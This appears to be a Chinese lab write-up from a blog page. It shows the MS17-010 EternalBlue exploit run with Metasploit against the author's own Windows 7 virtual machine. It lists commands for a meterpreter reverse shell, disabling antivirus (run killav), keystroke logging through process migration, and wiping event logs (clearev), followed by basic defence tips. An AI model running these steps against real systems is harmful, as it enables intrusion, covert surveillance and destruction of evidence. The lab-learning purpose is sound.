永恒之蓝MS17-010漏洞利用 writeup
MS17-010漏洞:
MS17-010漏洞:
• 一、 MS17-010漏洞公告及相关分析报告
•二、漏洞重现
•漏洞利用防范
• 一、 MS17-010漏洞公告及相关分析报告
★MS17_010 漏洞攻击:曾经危害全球的勒索病毒利用的永恒之蓝漏洞。
公告
Microsoft 安全公告 MS17-010 - 严重 Microsoft Windows SMB 服务器安全更新 (4013389) 发布日期:2017 年 3 月 14 日 漏洞信息 ●多个 Windows SMB 远程执行代码漏洞 ●当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。 ●为了利用此漏洞,在多数情况下,未经身份验证的攻击者可能向目标 SMBv1 服务器发送经特殊设计的数据包。 应对措施: 此安全更新通过更正 SMBv1 处理这些经特殊设计的请求的方式来修复漏洞。 |
可以看出,该漏洞的主要成因就是攻击者可向目标 SMBv1 服务器发送经特殊设计的数据包。以此来获取在目标系统上执行代码的能力。
•二、漏洞重现
1)环境搭建
1.下载安装kali虚拟系统。
Kali:一个基于 Debian 的 Linux 发行版。它的目标就是为了简单:在一个实用的工具包里尽可能多的包含渗透和审计工具。Kali 实现了这个目标。大多数做安全测试的开源工具都被囊括在内。
Kali 是由 Offensive Security 公司开发和维护的。它在安全领域是一家知名的、值得信赖的公司,它甚至还有一些受人尊敬的认证,来对安全从业人员做资格认证。
Kali 也是一个简便的安全解决方案。Kali 并不要求你自己去维护一个 Linux 系统,或者你自己去收集软件和依赖项。它是一个“交钥匙工程”。所有这些繁杂的工作都不需要你去考虑,因此,你只需要专注于要审计的真实工作上,而不需要去考虑准备测试系统。
安装完成后设置好相应的分辨率。
Kali系统
2.安装windows7
为了在受控的环境下模拟攻击过程,安装windows7虚拟机作为被攻击主机。
Win7系统
3.模拟使用 MS17_010 漏洞攻击
kali控制台输入:msfconsole
进入metasploit框架
●寻找MS17_010漏洞: search ms17_010
找寻漏洞
这里找到了五个模块,前两个辅助模块是探测主机是否存在MS17_010漏洞,后三个是漏洞利用模块,先探测哪些主机存在漏洞
2)侦察
●输入命令:use auxiliary/scanner/smb/smb_ms17_010
●查看这个模块需要配置的信息:show options
RHOSTS 参数是要探测主机的ip或ip范围,
比如若要探测一个ip范围内的主机是否存在漏洞
●输入:set RHOSTS 192.168.125.125-129.168.125.140
当然,由于是虚拟机环境,所以目标就是win7的主机
首先查看kali自己的ip地址:192.168.163.129
●然后关闭win7的防火墙:
关闭防火墙
●查看win7的ip地址:192.168.163.130
●尝试win7 ping kali:
●用kali ping win7:
都成功了。
●现在尝试一下漏洞扫描:
set RHOSTS 192.168.163.130
exploit
这里有+号的就是可能存在漏洞的主机。【可能是因为我把win7防火墙关了】
3)漏洞利用模块
●然后就可以去利用漏洞攻击了,选择漏洞攻击模块:
use exploit/windows/smb/ms17_010_eternalblue
●查看这个漏洞的信息:info
●查看可攻击的系统平台,这个命令显示该攻击模块针对哪些特定操作系统版本、语言版本的系统:show targets
●查看攻击载荷:show payloads
●设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
●查看模块需要配置的参数: show options
●设置RHOST,也就是要攻击主机的ip:set RHOST 192.168.163.130
●设置LHOST,也就是自己的ip,用于接收从目标机弹回来的shell:
set LHOST 192.168.163.129
攻击!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
冲啊!!!!!!!!!!!!!!!!!!!!!!!!!!!!
攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit攻击: exploit
攻击成功
4)后渗透阶段
●运行了exploit命令之后,开启了一个reverse TCP监听器来监听本地的 4444 端口,即我(攻击者)的本地主机地址(LHOST)和端口号(LPORT)。运行成功之后,将会看到命令提示符 meterpreter > 出现,
●输入: shell 即可切换到目标主机的windows shell,
成功!!!!!!
●可以尝试验证一下猜想:ipconfig
发现此时查询到的ip是win7的ip:192.168.163.130
完美!!!
美中不足的是中文貌似无法显示。
●要想从目标主机shell退出到 meterpreter ,只需输入:exit
●要想从 meterpreter 退出到MSF框架,输入:background
●输入: sessions -l 查看获得的shell,前面有id
●输入: session -i 1 即可切换到id为1的shell
●输入:sysinfo 查看目标主机的信息
可以看到这是刚才的win7
关闭杀毒软件 :
●拿到目标主机的shell后第一件事就是关闭掉目标主机的杀毒软件,通过命令:run killav
●现在这个可怜的win7 已经成为了我待宰的羔羊
●在win7中新建记事本,打开,模拟用户操作:
Kali中ps 命令查看目标设备中运行的进程:
●发现了notepad!!!!
Ok,继续:
可以使用: getpid 查看当前的进程id
●使用: migrate 命令来绑定目标进程id,这里绑定目标pid的时候
●绑定完成之后,就可以开始捕获键盘数据了
可以看到,他跟踪了我的键盘记录:
我是陈卓,来自CUG 192162班 我的学号是20161001412 |
●完成攻击操作之后,要记得“打扫战场”。
●所有操作都会被记录在目标系统的日志文件之中,因此需要在完成攻击之后使用命令 clearev 命令来清除事件日志:
●渗透测试结束~~~~~~~~
●退出!
•漏洞利用防范
1.定期更新官网的补丁,防止0日攻击。
2.不要浏览不安全,来源不明的网站。
3.防火墙始终保持开启。事实上防火墙可以帮助隔挡掉许多攻击行为。
4.不要轻易暴露自己的IP地址,如浏览暗网等行为,需要使用洋葱网络隐藏IP
5.时常扫描电脑查看是否有未知漏洞。
永恒之蓝MS17-010漏洞利用 writeup相关推荐
- 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用
好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷 ...
- 网络安全攻击手段之永恒之蓝【MS17_010】利用及漏洞剖析
声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!!! 永恒之蓝利用方法 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子 ...
- 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...
- 永恒之蓝漏洞复现测试
永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...
- metasploit复现永恒之蓝漏洞
Table of Contents 0x01 设备 0x02 条件 0x03 漏洞复现 0x04 漏洞利用 00x0 后话 0x01 设备 内置metasploit的kali Linux: win7. ...
- Metasploit(MSF)实战_永恒之蓝漏洞拿下win7靶机
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循<中华人民共和国网络安全法>,共同维护清朗的网络空间 一.Metasploit(MSF)简介 Metasploit与2003年由H. ...
- 勒索病毒WannaCry(永恒之蓝)
原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 .作者信息和本声明.否则将追究法律责任.http://solin.blog.51cto.com/11319413/1925890 勒索病 ...
- Metasploit渗透框架介绍及永恒之蓝复现
Metasploit渗透框架介绍及永恒之蓝复现 一.Metasploit渗透框架介绍 1.1 名词解释 1.2 MSF简介 1.3 MSF框架结构 1.4 MSF命令汇总 1.4.1 常用命令 1.4 ...
- 09永恒之蓝与永恒之黑的复现
一.永恒之蓝 1.简介 2017年3月14日,微软公布SMB远程代码执行漏洞(MS17-010),又称永恒之蓝,该漏洞在 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时 ...
最新文章
- jq中查找上级_【节能学院】电能管理系统在福州三岐小学项目中的设计及应用...
- android qq弹出菜单,Android开发实现qqminihd 左右滑动菜单效果
- 自学前端1年,靠着这份面试题和答案,我找到了20K工作
- [转载] Python日历模块| 使用示例的weekday()方法
- python开发k8s管理平台_运维开发和k8s运维如何选择,请各位大神指导一下?
- 考满分软件测试工程师(实习)面试软达启航面试
- Oracle数据反向恢复
- 避坑!!!Matlab中文版下载地址、详细讲解Matlab中文版的下载、安装
- iOS传感器开发——加速度传感器,螺旋仪传感器,磁力传感器的应用
- git log查看提交的Author是由谁决定的呢?
- java clh_【Java并发编程实战】—– AQS(四):CLH同步队列
- 2022CCPC预选赛J Roulette
- mysql的索引缺点_Sqlite数据库中索引的使用、索引的优缺点
- 多租户SaaS管理系统框架设计:多租户,多组织,用户区别
- 英语论文写作技巧-2
- 香油和一个生鸡蛋,干咳偏方
- 腾讯社招 —— 腾讯游戏后端工程师(一面)
- 魔力鸭linux驱动下载,魔力鸭原厂2108s固件
- React全家桶+AntD 实战二
- Linux---进程调度及CFS调度器
热门文章
- Flask(十二)——消息闪现
- OSChina 周六乱弹 —— 到底谁是小公猫……
- Linux学习 -- Shell面试题练习
- python安装要装oracle,python安装oracle数据库
- 指标详解(2)-- 指数平滑移动平均线(MACD)详解
- android8 .te文件,te文件
- 关于单精度和双精度实数
- 垃圾分类解决方案-最新全套文件
- 子曰:“吾十有五而志于学.......
- 湖北省计算机二级报名时间2020年12,2020年3月湖北省计算机等级考试报名_时间:12月10日-12月23日...